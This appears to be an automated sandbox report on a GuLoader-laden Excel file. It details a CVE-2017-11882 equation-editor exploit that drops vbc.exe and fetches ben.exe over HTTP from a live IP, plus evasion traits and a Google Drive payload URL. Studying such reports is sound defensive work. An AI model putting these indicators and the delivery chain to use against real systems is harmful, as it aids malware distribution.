Windows Analysis Report new order no. Hc511 for sept.xlsx

Overview

General Information

Sample Name: new order no. Hc511 for sept.xlsx
Analysis ID: 482516
MD5: 10522a9c4f1f52b4fe31456e03133b43
SHA1: f78da793ab620c213e55e33ecdfe689f780eb910
SHA256: 342d93a58f17297d9de1ab5dbe0f23298f1cb7e2622d5816208ce5ef11579984
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&i"}
Multi AV Scanner detection for submitted file
Source: new order no. Hc511 for sept.xlsx Virustotal: Detection: 30%
Source: new order no. Hc511 for sept.xlsx ReversingLabs: Detection: 23%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 15%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.26.190:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.26.190:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&i
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.245.26.190
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:58:54 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 12:47:12 GMTETag: "20000-5cbdfdd2ef7af"Accept-Ranges: bytesContent-Length: 131072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /gen/ben.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.26.190Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: vbc.exe.4.dr String found in binary or memory: http://creativecommons.org/licenses/by-nc-sa/3.0/
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 74DB69FF.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74DB69FF.emf

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe
Detected potential crypto function
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C7129 NtAllocateVirtualMemory, 6_2_003C7129
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C7191 NtAllocateVirtualMemory, 6_2_003C7191
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C71FD NtAllocateVirtualMemory, 6_2_003C71FD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C728D NtAllocateVirtualMemory, 6_2_003C728D
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: ben[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: new order no. Hc511 for sept.xlsx Virustotal: Detection: 30%
Source: new order no. Hc511 for sept.xlsx ReversingLabs: Detection: 23%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$new order no. Hc511 for sept.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR1F14.tmp
Source: classification engine Classification label: mal100.troj.expl.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00417B40 push dword ptr [edi+000000BCh]; ret 6_2_0041854C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405015 push esi; iretd 6_2_00405016
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406435 push esi; retf 6_2_00406436
Source: C:\Users\Public\vbc.exe Code function: 6_2_004066C5 pushfd ; iretd 6_2_004066C7
Source: C:\Users\Public\vbc.exe Code function: 6_2_004038CD push esi; ret 6_2_004038D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040394E push ds; iretd 6_2_0040397F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404F35 push esi; iretd 6_2_00404F36
Source: C:\Users\Public\vbc.exe Code function: 6_2_004043D0 pushfd ; retf 6_2_004043D2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C3DBA push 38926977h; ret 6_2_003C3DC1
Source: initial sample Static PE information: section name: .text entropy: 7.1086042671

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1444 Thread sleep time: -120000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9F3C rdtsc 6_2_003C9F3C

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9F3C rdtsc 6_2_003C9F3C
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C6C03 mov eax, dword ptr fs:[00000030h] 6_2_003C6C03
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C4167 mov eax, dword ptr fs:[00000030h] 6_2_003C4167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9282 mov eax, dword ptr fs:[00000030h] 6_2_003C9282

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp Binary or memory string: Program Manager<